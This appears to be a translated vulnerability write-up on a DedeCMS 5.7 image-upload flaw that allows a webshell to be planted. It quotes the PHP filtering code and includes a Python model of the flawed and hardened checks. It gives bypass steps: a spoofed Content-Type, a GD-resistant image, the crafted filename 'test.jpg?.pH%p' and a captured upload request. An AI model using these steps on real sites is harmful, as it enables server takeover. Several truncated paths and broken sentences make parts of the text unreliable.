DedeCMS v5.7 front-end low-value & back-end getshell vulnerability

Posted by millikan at 2020-03-15

Official download of the latest installation package

The DedeCMS (Zhimeng) 5.7 member center, for security reasons, restricts registered members from uploading images when they publish content from the member center, while an administrator logged into the member center is not affected. How is this resolved? Let's walk through the specifics.

The concrete symptom is this: a registered member clicks image upload, previews and selects an image, then clicks upload to server. The result is an image upload failure. After the upload, the submit button does not jump to the corresponding image-properties dialog; only a scroll bar appears in the current window. Above that scroll bar is the message "Prompt: you need to enter the background management directory to log in", but because the height of the scrolled area is limited, the message is not visible until you drag the scroll bar all the way down. As shown in the figure.

Knowing the cause, the problem is easy to solve. Search all files under the DedeCMS program folder for the string "Prompt: you need to enter the background management directory to log in" and you find the file include/dialog/config.php. It contains this code:

```php
// Check the user's login state
$cuserLogin = new userLogin();
if($cuserLogin->getUserID() <= 0)
{
    if(empty($adminDirHand))
    {
        // Not logged in and no admin directory supplied: ask for the admin directory name
        ShowMsg("<b>提示:需输入后台管理目录才能登录</b><form action='#' method='post'>请输入后台管理目录名:<input type='text' name='adminDirHand' style='width:120px;' /><input type='submit' value='确定' /></form>", 'javascript:;');
        exit();
    }
    // Otherwise redirect to the admin login page and come back here afterwards
    $gurl = "../../{$adminDirHand}/login.php?gotopage=".urlencode($dedeNowurl);
    echo "<script>location='$gurl';</script>";
    exit();
}
```

Therefore, on DedeCMS 5.7 an image upload from the member center must pass the check above. In what follows we go along with that rule and assume the administrator has enabled the image upload permission for members. On versions lower than 5.7, simply opening the member center is enough.

In a Windows environment the image needs special preparation, because after the file-suffix check is bypassed, PHP GD re-renders the image, which displaces and breaks the webshell code embedded in it; so an image that survives GD processing must be prepared specially.

Vulnerability file: include/dialog/select_images_post.php


Let's first look at the file it includes, which makes the main code easier to read later.

Location: include/dialog/config.php


Continue tracing the included files.

Location: include \

```php
if($_FILES)
{
    require_once(DEDEINC.'/');
}
```

Following this include, you finally reach the upload-handling code. Besides the login check shown above, this file also filters out certain disallowed file types, so let's follow it in.

You can see under include \

```php
$cfg_not_allowall = "php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml";
```

The forbidden upload types are enforced as a blacklist of extensions.

Looking further down:

```php
$imtypes = array
(
    "image/pjpeg", "image/jpeg", "image/gif", "image/png",
    "image/xpng", "image/wbmp", "image/bmp"
);
// Only when the client-declared MIME type claims an image is the content checked
if(in_array(strtolower(trim(${$_key.'_type'})), $imtypes))
{
    $image_dd = @getimagesize($$_key);
    if (!is_array($image_dd))
    {
        exit('Upload filetype not allow !');
    }
}
```

Here it checks the declared type of the uploaded image. Since that type comes from the client, bypassing this check only requires modifying the HTTP Content-Type header.

The headache is the getimagesize function, which reads the image size and related information, so the uploaded content must still parse as a real image.

Now look at select_images_post.php itself:

```php
$imgfile_name = trim(preg_replace("#[ \r\n\t\*\%\\\/\?><\|\":]{1,}#", '', $imgfile_name));
```

This is a regex substitution that strips those characters out of the filename.

A normal image uploaded there is accepted, but xxx.php will fail.

Because the check above is written as a regex, bypassing it is just as simple: the name only has to differ from the blacklist entries, for example pH%P and so on!

Look at the next line of code:

```php
if(!preg_match("#\.(".$cfg_imgtype.")#i", $imgfile_name))
```

The code here is not rigorous: the blacklist is checked only once, against the raw name before the characters above are stripped, and the image-type regex is not anchored to the end of the name. The constructed image name is test.jpg?.pH%p
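To make the ordering and anchoring problem concrete, here is an added Python model of the two checks (example code, not DedeCMS's own): the strip regex and the blacklist string are taken from the page, while the anchored form of the blacklist check and the jpg|gif|png value of $cfg_imgtype are assumptions. The hardened version strips first and decides on the final extension with an anchored allow-list; it also refuses double extensions such as shell.php.jpg, which goes beyond the page.

```python
import re

# Values quoted on the page (DedeCMS 5.7 defaults); $cfg_imgtype is an assumed allow-list.
CFG_NOT_ALLOWALL = "php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml"
CFG_IMGTYPE = "jpg|gif|png"

# Character-stripping regex from select_images_post.php, written as a Python raw string.
STRIP_RE = re.compile(r'[ \r\n\t*%\\/?><|":]+')
# Assumed shape of the blacklist check in the included file: anchored at the end of the raw name.
BLACKLIST_RE = re.compile(r'\.(' + CFG_NOT_ALLOWALL + r')$', re.I)
# Image-type check exactly as on the page: no end anchor, so ".jpg" anywhere satisfies it.
IMGTYPE_RE = re.compile(r'\.(' + CFG_IMGTYPE + r')', re.I)


def vulnerable_filter(name):
    """Model of the original order: blacklist on the raw name, strip, then unanchored allow-list.
    Returns the name the file would be stored under, or None when the upload is refused."""
    if BLACKLIST_RE.search(name.strip()):
        return None
    cleaned = STRIP_RE.sub('', name).strip()
    if not IMGTYPE_RE.search(cleaned):
        return None
    return cleaned


def hardened_filter(name):
    """Strip first, then decide on the final extension with an anchored allow-list,
    and refuse any executable token anywhere in a multi-dot name (shell.php.jpg)."""
    cleaned = STRIP_RE.sub('', name).strip()
    parts = cleaned.lower().split('.')
    if len(parts) < 2 or parts[-1] not in CFG_IMGTYPE.split('|'):
        return None
    if any(p in CFG_NOT_ALLOWALL.split('|') for p in parts[1:]):
        return None
    return cleaned


if __name__ == '__main__':
    # Constructed sample names: a clean image, a plain script, the page's crafted name, a double extension
    for n in ('photo.jpg', 'shell.php', 'test.jpg?.pH%p', 'shell.php.jpg'):
        print(f'{n!r:20} vulnerable -> {vulnerable_filter(n)!r:18} hardened -> {hardened_filter(n)!r}')
```

Running it shows the crafted name passing the original order and being stored as test.jpg.pHp, while the hardened check refuses it.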

Environment: Linux + phpstudy

Capture of the image upload request:

```http
POST /dedecms/include/dialog/select_images_post.php?CKEditor=body&CKEditorFuncNum=2&langCode=zh-cn HTTP/1.1
Host: *******
Content-Length: 42080
Cache-Control: max-age=0
Origin: http://*******
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZNrPDjZXsDjHXAYJ
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://*******/dedecms/dede/archives_add.php?channelid=6&cid=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ***
Connection: close

------WebKitFormBoundaryZNrPDjZXsDjHXAYJ
Content-Disposition: form-data; name="upload"; filename="test.jpg"
Content-Type: image/jpeg

*******
------WebKitFormBoundaryZNrPDjZXsDjHXAYJ--
```

Then change the filename

Then visit the

0x03 Thanks

This article thanks wind and phpoop for their help with the code analysis! Why do we say the back end can also get shell? Because the front-end editor calls the back-end editor, so you only need to comment out the front end to get shell!

Our company is not responsible for the above information